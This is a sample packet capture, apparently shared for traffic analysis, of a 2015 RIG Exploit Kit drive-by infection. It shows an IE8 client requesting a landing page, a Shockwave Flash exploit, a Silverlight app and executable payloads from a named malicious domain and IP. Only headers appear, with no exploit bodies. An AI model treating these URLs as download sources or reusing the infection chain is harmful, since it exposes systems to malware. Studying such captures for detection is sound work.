RIG Exploit Kit Shockwave Flash Silverlight Traffic Analysis Sample PCAP file download

2015-02-05 19:18:44.979982 IP 192.168.221.134.49585 > 46.182.30.163.80: Flags [.], ack 1, win 64240, length 0
E..(.|@…………….P..@.}..+P…’………
2015-02-05 19:18:44.981188 IP 192.168.221.134.49585 > 46.182.30.163.80: Flags [P.], seq 1:603, ack 1, win 64240, length 602: HTTP: GET /?PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJkuHbwvnPVsbu|ZjA1YzNkM2M4NWMxMDBlMWIyODgyMzgwNmZkY2NmODU HTTP/1.1
E….}@….p………..P..@.}..+P…
…GET /?PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJkuHbwvnPVsbu|ZjA1YzNkM2M4NWMxMDBlMWIyODgyMzgwNmZkY2NmODU HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: cast.autolistprofits.net
Connection: Keep-Alive

2015-02-05 19:18:44.981212 IP 46.182.30.163.80 > 192.168.221.134.49585: Flags [.], ack 603, win 64240, length 0
E..(C…………….P..}..+..CGP…%a……..
2015-02-05 19:18:46.627230 IP 46.182.30.163.80 > 192.168.221.134.49585: Flags [P.], seq 1:1356, ack 603, win 64240, length 1355: HTTP: HTTP/1.1 200 OK
E..sEi……………P..}..+..CGP…A…HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Thu, 05 Feb 2015 23:18:46 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.4-14+deb7u14
Vary: Accept-Encoding
Content-Encoding: gzip

2015-02-05 19:18:50.475075 IP 192.168.221.134.49585 > 46.182.30.163.80: Flags [P.], seq 603:1019, ack 72089, win 64240, length 416: HTTP: GET /index.php?req=mp3&num=39&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJk
uHbwvnPVsbu%7CZjA1YzNkM2M4NWMxMDBlMWIyODgyMzgwNmZkY2NmODU HTTP/1.1
E…..@…………….P..CG}.2.P…….GET /index.php?req=mp3&num=39&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJkuHbwvnPVsbu%7CZjA1YzNkM2M4NWMxMDBlMWIyODgyMzgwNmZkY2NmODU HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: cast.autolistprofits.net
Connection: Keep-Alive

2015-02-05 19:18:50.475173 IP 46.182.30.163.80 > 192.168.221.134.49585: Flags [.], ack 1019, win 64240, length 0
E..(I}……………P..}.2…D.P…
(……..
2015-02-05 19:18:55.945377 IP 46.182.30.163.80 > 192.168.221.134.49585: Flags [P.], seq 72089:73444, ack 1019, win 64240, length 1355: HTTP: HTTP/1.1 200 OK
E..sN……6………P..}.2…D.P…….HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Thu, 05 Feb 2015 23:18:55 GMT
Content-Type: application/x-msdownload
Content-Length: 294912
Connection: keep-alive
X-Powered-By: PHP/5.4.4-14+deb7u14
Accept-Ranges: bytes

2015-02-05 19:18:58.699151 IP 192.168.221.134.49585 > 46.182.30.163.80: Flags [P.], seq 1019:1631, ack 367224, win 63207, length 612: HTTP: GET /index.php?req=swf&num=1779&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJkuHbwvnPVsbu|ZjA1YzNkM2M4NWMxMDBlMWIyODgyMzgwNmZkY2NmODU HTTP/1.1
E…..@…………….P..D.}…P…+D..GET /index.php?req=swf&num=1779&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJkuHbwvnPVsbu|ZjA1YzNkM2M4NWMxMDBlMWIyODgyMzgwNmZkY2NmODU HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://cast.autolistprofits.net/?PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJkuHbwvnPVsbu|ZjA1YzNkM2M4NWMxMDBlMWIyODgyMzgwNmZkY2NmODU
x-flash-version: 11,8,800,94
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: cast.autolistprofits.net
Connection: Keep-Alive

2015-02-05 19:18:58.699233 IP 46.182.30.163.80 > 192.168.221.134.49585: Flags [.], ack 1631, win 64240, length 0
E..(R`……………P..}…..GKP………….
2015-02-05 19:18:59.324451 IP 46.182.30.163.80 > 192.168.221.134.49585: Flags [P.], seq 367224:368579, ack 1631, win 64240, length 1355: HTTP: HTTP/1.1 200 OK
E..sR…………….P..}…..GKP…,$..HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Thu, 05 Feb 2015 23:18:58 GMT
Content-Type: application/x-shockwave-flash
Content-Length: 20239
Connection: keep-alive
X-Powered-By: PHP/5.4.4-14+deb7u14

2015-02-05 19:19:00.734735 IP 192.168.221.134.49586 > 46.182.30.163.80: Flags [P.], seq 1:290, ack 1, win 64240, length 289: HTTP: GET /index.php?req=mp3&num=1155&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJkuHbwvnPVsbu|ZjA1YzNkM2M4NWMxMDBlMWIyODgyMzgwNmZkY2NmODU&dop=1 HTTP/1.1
E..I..@…./………..P…Y)~  AP…2{..GET /index.php?req=mp3&num=1155&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJkuHbwvnPVsbu|ZjA1YzNkM2M4NWMxMDBlMWIyODgyMzgwNmZkY2NmODU&dop=1 HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: cast.autolistprofits.net

2015-02-05 19:19:00.734812 IP 46.182.30.163.80 > 192.168.221.134.49586: Flags [.], ack 290, win 64240, length 0
E..(T{……………P..)~      A…zP….I……..
2015-02-05 19:19:01.474645 IP 46.182.30.163.80 > 192.168.221.134.49586: Flags [P.], seq 1:205, ack 290, win 64240, length 204: HTTP: HTTP/1.1 200 OK
E…U2…..I………P..)~      A…zP…….HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Thu, 05 Feb 2015 23:19:00 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.4-14+deb7u14
Vary: Accept-Encoding

 

2015-02-05 19:19:01.787474 IP 192.168.221.134.49587 > 46.182.30.163.80: Flags [P.], seq 1:408, ack 1, win 64240, length 407: HTTP: GET /index.php?req=xap&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJkuHbwvnPVsbu|ZjA1YzNkM2M4NWMxMDBlMWIyODgyMzgwNmZkY2NmODU HTTP/1.1
E…..@…………….P.K’.;…P…07..GET /index.php?req=xap&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJkuHbwvnPVsbu|ZjA1YzNkM2M4NWMxMDBlMWIyODgyMzgwNmZkY2NmODU HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: cast.autolistprofits.net
Connection: Keep-Alive

2015-02-05 19:19:01.787528 IP 46.182.30.163.80 > 192.168.221.134.49587: Flags [.], ack 408, win 64240, length 0
E..(U…………….P..;….K)5P…wq……..
2015-02-05 19:19:02.486632 IP 46.182.30.163.80 > 192.168.221.134.49587: Flags [P.], seq 1:1356, ack 408, win 64240, length 1355: HTTP: HTTP/1.1 200 OK
E..sV:……………P..;….K)5P…`…HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Thu, 05 Feb 2015 23:19:02 GMT
Content-Type: application/x-silverlight-app
Content-Length: 26238
Connection: keep-alive
X-Powered-By: PHP/5.4.4-14+deb7u14

 

2015-02-05 19:19:05.616016 IP 192.168.221.134.49585 > 46.182.30.163.80: Flags [P.], seq 1631:2059, ack 387668, win 64240, length 428: HTTP: GET /index.php?req=mp3&num=90199&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJkuHbwvnPVsbu%7CZjA1YzNkM2M4NWMxMDBlMWIyODgyMzgwNmZkY2NmODU&dop=0828 HTTP/1.1
E…    @…………….P..GK}..~P…R…GET /index.php?req=mp3&num=90199&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJkuHbwvnPVsbu%7CZjA1YzNkM2M4NWMxMDBlMWIyODgyMzgwNmZkY2NmODU&dop=0828 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: cast.autolistprofits.net
Connection: Keep-Alive

2015-02-05 19:19:05.616097 IP 46.182.30.163.80 > 192.168.221.134.49585: Flags [.], ack 2059, win 64240, length 0
E..(YZ……………P..}..~..H.P…5X……..
2015-02-05 19:19:08.130541 IP 46.182.30.163.80 > 192.168.221.134.49585: Flags [P.], seq 387668:389023, ack 2059, win 64240, length 1355: HTTP: HTTP/1.1 200 OK
E..s[……0………P..}..~..H.P…….HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Thu, 05 Feb 2015 23:19:07 GMT
Content-Type: application/x-msdownload
Content-Length: 294912
Connection: keep-alive
X-Powered-By: PHP/5.4.4-14+deb7u14
Accept-Ranges: bytes